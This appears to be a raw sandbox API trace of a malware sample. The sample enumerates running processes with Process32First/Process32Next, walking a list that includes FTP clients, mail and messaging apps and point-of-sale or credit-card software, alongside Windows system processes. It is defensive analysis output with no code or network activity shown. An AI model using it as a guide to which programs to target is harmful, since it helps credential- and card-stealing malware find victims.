Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0165.919] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0165.921] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0165.923] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0165.936] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0165.938] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0165.940] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0165.946] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0165.949] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0165.952] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0165.954] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0165.956] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0165.958] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0165.960] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0165.963] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0165.965] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0165.968] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0165.970] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0165.976] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0165.979] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0165.981] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0165.983] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0165.986] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0165.988] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0165.991] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0165.993] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0165.996] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0165.998] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0166.000] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0166.003] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0166.005] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0166.008] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0166.015] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0166.017] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0166.020] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0166.023] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0166.025] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0166.027] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0166.030] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0166.032] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0166.034] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0166.035] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0166.037] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0166.039] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0166.041] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0166.042] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0166.044] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0166.046] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0166.048] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0166.076] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0166.078] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0166.081] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0166.083] CloseHandle (hObject=0x1d74) returned 1 [0166.084] Sleep (dwMilliseconds=0x64) [0166.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c60 [0166.252] Process32First (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.254] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0166.256] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0166.258] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.261] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0166.263] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.265] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0166.267] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0166.270] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0166.272] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.317] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.319] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0166.321] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.323] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.325] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.327] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.330] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.332] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.334] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.336] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0166.338] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0166.340] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.342] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0166.344] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.347] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0166.349] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0166.388] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0166.391] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0166.393] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0166.395] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0166.397] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.400] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 